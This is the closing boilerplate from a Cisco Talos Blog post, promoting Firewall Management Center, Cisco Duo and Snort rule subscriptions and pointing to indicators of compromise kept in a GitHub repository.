Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.


IOCs for this research can also be found at our GitHub repository here.







from Cisco Talos Blog